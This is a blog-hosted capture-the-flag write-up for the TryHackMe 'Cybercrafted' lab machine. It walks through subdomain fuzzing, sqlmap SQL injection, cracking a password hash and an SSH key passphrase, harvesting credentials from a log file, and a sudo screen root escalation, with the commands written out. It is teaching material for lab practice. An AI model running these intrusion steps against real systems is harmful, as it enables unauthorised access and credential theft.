<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Cybercrafted" /><meta property="og:locale" content="en" /><meta name="description" content="Machine Name Date Level Type Cybercrafted 2021-11-24 Medium ctf" /><meta property="og:description" content="Machine Name Date Level Type Cybercrafted 2021-11-24 Medium ctf" /><link rel="canonical" href="https://cyber7ron.github.io/posts/Cybercrafted/" /><meta property="og:url" content="https://cyber7ron.github.io/posts/Cybercrafted/" /><meta property="og:site_name" content="Akshay Chavan" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-11-24T11:11:11+05:30" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Cybercrafted" /><meta name="twitter:site" content="@icyber7ron" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2021-11-24T11:11:11+05:30","datePublished":"2021-11-24T11:11:11+05:30","description":"Machine Name Date Level Type Cybercrafted 2021-11-24 Medium ctf","headline":"Cybercrafted","mainEntityOfPage":{"@type":"WebPage","@id":"https://cyber7ron.github.io/posts/Cybercrafted/"},"url":"https://cyber7ron.github.io/posts/Cybercrafted/"}</script><title>Cybercrafted | Akshay Chavan</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Akshay Chavan"><meta name="application-name" content="Akshay Chavan"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/avatar.jpg " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Akshay Chavan</a></div><div class="site-subtitle font-italic">Blog dedicated to cyber security articles and writeups.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/Akshaychavan10" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/icyber7ron" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['akschavan100','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Cybercrafted</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Cybercrafted</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/icyber7ron">Akshay Chavan</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1637732471" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2021-11-24 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="691 words"> <em>3 min</em> read</span></div></div></div><div class="post-content"><div class="table-wrapper"><table><thead><tr><th>Machine Name<th>Date<th>Level<th>Type<tbody><tr><td>Cybercrafted<td>2021-11-24<td>Medium<td>ctf</table></div><p><img data-src="https://tryhackme-images.s3.amazonaws.com/room-icons/dd06737472c79a806e2049ddeb3af354.png" alt="infocard" data-proofer-ignore></p><p>Pwn this pay-to-win Minecraft server!</p><h2 id="reconnaissance"><span class="mr-2">Reconnaissance</span><a href="#reconnaissance" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>As always start with the Nmap.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre>Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 23:54 EST
Nmap scan report for cybercrafted.thm (10.10.61.207)
Host is up (0.17s latency).

PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
|   256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_  256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp    open  http      Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cybercrafted
25565/tcp open  minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r  ck00r, Users: 0/1)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds


</pre></table></code></div></div><p>here we get the HTTP server and ssh service.</p><h3 id="http"><span class="mr-2">HTTP</span><a href="#http" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>Let’s Enumerate the HTTP first.</p><p>When we browse the IP address into a browser it redirects us to <code class="language-plaintext highlighter-rouge">http://cybercrafted.thm/</code>. Add it to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file.</p><p><code class="language-plaintext highlighter-rouge">index.html</code> serves a static image.</p><p><img data-src="/assets/thm/cybercrafted/index_page.png" alt="index" data-proofer-ignore></p><p>Review source code we get an HTML comment.</p><div class="language-html highlighter-rouge"><div class="code-header"> <span data-label-text="HTML"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="c">&lt;!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! --&gt;</span>

</pre></table></code></div></div><p>We need to find a subdomain for the machine. Lets bruteforce for subdomains.</p><p>` ffuf -w /usr/share/wordlist/dirb/common.md -u http://cybercrafted.thm/ -H “Host: FUZZ.cybercrafted.thm”`</p><p>by brute-forcing, we get three subdomains.</p><ol><li>www<li>store<li>admin</ol><p>add subdomain in <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file.</p><p>/admin looks interesting.</p><p><img data-src="/assets/thm/cybercrafted/admin_login.png" alt="admin log in page" data-proofer-ignore></p><p>Try some SQL injection bypass techniques but failed.</p><p>/store is a Forbidden resource. but when we do directory fuzzing on store.cybercrafted.thm we get <code class="language-plaintext highlighter-rouge">/search.php</code></p><p><code class="language-plaintext highlighter-rouge">search.php</code> searches items from the database so it might be vulnerable to SQL injection. Let’s test using <code class="language-plaintext highlighter-rouge">sqlmap</code>.</p><p>Capture the <code class="language-plaintext highlighter-rouge">search.php</code> request in burp and save it to <code class="language-plaintext highlighter-rouge">sqltest.txt</code></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>POST /search.php HTTP/1.1
Host: store.cybercrafted.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://store.cybercrafted.thm
Connection: close
Referer: http://store.cybercrafted.thm/search.php
Upgrade-Insecure-Requests: 1

search=testing&amp;submit=

</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">sqlmap -r sqltest --batch --dbs</code></p><p>/search.php is vulnerable to SQL injection.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>available databases [5]:                                                                                              
[*] information_schema                                     
[*] mysql                                                  
[*]performance_schema                                                    [*] sys                                                                                                               
[*] webapp   

</pre></table></code></div></div><p>Enumerate the database found user and hash.</p><p>xXUltimateCreeperXx: 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01</p><p>after cracking the hash got password: <code class="language-plaintext highlighter-rouge">di*************9</code></p><p>user <code class="language-plaintext highlighter-rouge">xXUltimateCreeperXx:di*************9</code> Login into <code class="language-plaintext highlighter-rouge">admin.cybercrafted.thm</code></p><p>After login, we got <code class="language-plaintext highlighter-rouge">/panel.php</code> on which we can run system commands.</p><p>From here we can get a shell by various ways.</p><h2 id="gaining-access"><span class="mr-2">Gaining Access</span><a href="#gaining-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Mostly I prefer ssh shell because it’s the stable one.</p><p>from <code class="language-plaintext highlighter-rouge">panel.php</code> get xXUltimateCreeperXx user’s private ssh key.</p><p><img data-src="/assets/thm/cybercrafted/key.png" alt="key" data-proofer-ignore></p><p>A private key is encrypted. Let’s crack it using <code class="language-plaintext highlighter-rouge">ssh2john</code> and <code class="language-plaintext highlighter-rouge">john</code></p><p><code class="language-plaintext highlighter-rouge">ssh2john id_rsa &gt; hash</code></p><p><code class="language-plaintext highlighter-rouge">john hash --wordlist=/usr/share/wordlist/rockyou.txt</code></p><p>john crack the password successfully: <code class="language-plaintext highlighter-rouge">c*********6</code></p><p>Login as <code class="language-plaintext highlighter-rouge">xxultimatecreeperxx</code></p><h2 id="privilege-escalation"><span class="mr-2">Privilege Escalation</span><a href="#privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><h3 id="escalate-from-xxultimatecreeperxx-to-cybercrafted"><span class="mr-2">Escalate from xxultimatecreeperxx to cybercrafted</span><a href="#escalate-from-xxultimatecreeperxx-to-cybercrafted" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>After downloading <code class="language-plaintext highlighter-rouge">linpeas.sh</code> to the target machine and enumerating it for some time I find Minecraft server on the machine.</p><p>this Minecraft server has a plugin called <code class="language-plaintext highlighter-rouge">loginsystem</code> which has a log file called <code class="language-plaintext highlighter-rouge">log.txt</code>.</p><p><code class="language-plaintext highlighter-rouge">/opt/mincraft/cybercrafted/plugins/LoginSystem/log.txt</code></p><p>From this file, we get the password for <code class="language-plaintext highlighter-rouge">cybercrafted</code> user.</p><p><code class="language-plaintext highlighter-rouge">cybercrafted:J*****************k</code></p><p>Log in as <code class="language-plaintext highlighter-rouge">cybercrafted</code>.</p><p>Now we have a password for <code class="language-plaintext highlighter-rouge">cybercrafted</code>.</p><h3 id="escalate-from-cybercrafted-to-root"><span class="mr-2">Escalate from cybercrafted to root</span><a href="#escalate-from-cybercrafted-to-root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>Did some enumeration on the box and found out that <code class="language-plaintext highlighter-rouge">cybercrafted</code> can run <code class="language-plaintext highlighter-rouge">/usr/bin/screen</code> as root.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted


</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">screen</code> is used to start a screen session or open any number of the window inside a session.</p><p><code class="language-plaintext highlighter-rouge">/usr/bin/screen -r cybercrafted</code> here <code class="language-plaintext highlighter-rouge">-r</code> used to resume the screen session of user <code class="language-plaintext highlighter-rouge">cybercrafted</code>.</p><p>After some research, I found out that we can create a new window with a shell using <code class="language-plaintext highlighter-rouge">screen</code>.</p><p><code class="language-plaintext highlighter-rouge">sudo -u /usr/bin/screen -r cybercrafted</code></p><p>it attaches the screen of <code class="language-plaintext highlighter-rouge">cybercrafted</code> . then use shortcut <code class="language-plaintext highlighter-rouge">ctrl+a+c</code> and we get a root shell.</p><p><code class="language-plaintext highlighter-rouge">ctrl+a+c</code> is used to create a new window with shell. and this program is running as root we get root window shell.</p><p><img data-src="/assets/thm/cybercrafted/root.png" alt="root" data-proofer-ignore></p><h2 id="resources"><span class="mr-2">Resources</span><a href="#resources" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><a href="https://linuxize.com/post/how-to-use-linux-screen/">How To Use Linux Screen</a></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/ctf/'>CTF</a>, <a href='/categories/tryhackme/'>tryhackme</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/dns/" class="post-tag no-text-decoration" >dns</a> <a href="/tags/sqli/" class="post-tag no-text-decoration" >sqli</a> <a href="/tags/hash/" class="post-tag no-text-decoration" >hash</a> <a href="/tags/sudo/" class="post-tag no-text-decoration" >sudo</a> <a href="/tags/minecraft/" class="post-tag no-text-decoration" >minecraft</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Cybercrafted - Akshay Chavan&amp;url=https://cyber7ron.github.io/posts/Cybercrafted/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Cybercrafted - Akshay Chavan&amp;u=https://cyber7ron.github.io/posts/Cybercrafted/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://cyber7ron.github.io/posts/Cybercrafted/&amp;text=Cybercrafted - Akshay Chavan" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/2-the-shell/">2. The Shell</a><li><a href="/posts/5-intro-to-lan/">5. Intro to LAN</a><li><a href="/posts/2-Intro-to-defensive-security/">2. Intro to Defensive Security</a><li><a href="/posts/Putting-it-All-Together/">Putting it All Together</a><li><a href="/posts/1-Intro-to-Offensive-Security/">1. Intro to Offensive Security</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/sudo/">sudo</a> <a class="post-tag" href="/tags/c/">c</a> <a class="post-tag" href="/tags/components/">components</a> <a class="post-tag" href="/tags/dns/">dns</a> <a class="post-tag" href="/tags/file-upload/">file upload</a> <a class="post-tag" href="/tags/ftp/">ftp</a> <a class="post-tag" href="/tags/permission/">permission</a> <a class="post-tag" href="/tags/shell/">shell</a> <a class="post-tag" href="/tags/suid/">suid</a> <a class="post-tag" href="/tags/web/">web</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Mirai/"><div class="card-body"> <em class="timeago small" data-ts="1606485612" > 2020-11-27 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Mirai</h3><div class="text-muted small"><p> Mirai is the easy box which have default creds to gain shell access and the sudo for root access, althrought it has some forensic challenge to find root flag. Enumeration As always we start wit...</p></div></div></a></div><div class="card"> <a href="/posts/Shoker/"><div class="card-body"> <em class="timeago small" data-ts="1606527610" > 2020-11-28 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Shoker</h3><div class="text-muted small"><p> Enumeration Shoker is an easy box and by the name, we can guess that it has shellshock vulnerability. which allow attacker to remotely execute code on system. its found in unix bash shell so it ...</p></div></div></a></div><div class="card"> <a href="/posts/bashed/"><div class="card-body"> <em class="timeago small" data-ts="1606579230" > 2020-11-28 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Bashed</h3><div class="text-muted small"><p> bashed is easy box Enumeration As always we start with Nmap. Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 10:34 CET Nmap scan report for 10.10.10.68 Host is up (0.073s latency). ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Content-Discovery/" class="btn btn-outline-primary" prompt="Older"><p>Content Discovery</p></a> <a href="/posts/Cmspit/" class="btn btn-outline-primary" prompt="Newer"><p>Cmspit</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2024 <a href="https://twitter.com/icyber7ron">Akshay Chavan</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/sudo/">sudo</a> <a class="post-tag" href="/tags/c/">c</a> <a class="post-tag" href="/tags/components/">components</a> <a class="post-tag" href="/tags/dns/">dns</a> <a class="post-tag" href="/tags/file-upload/">file upload</a> <a class="post-tag" href="/tags/ftp/">ftp</a> <a class="post-tag" href="/tags/permission/">permission</a> <a class="post-tag" href="/tags/shell/">shell</a> <a class="post-tag" href="/tags/suid/">suid</a> <a class="post-tag" href="/tags/web/">web</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-36THN7W1HK"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-36THN7W1HK'); }); </script>
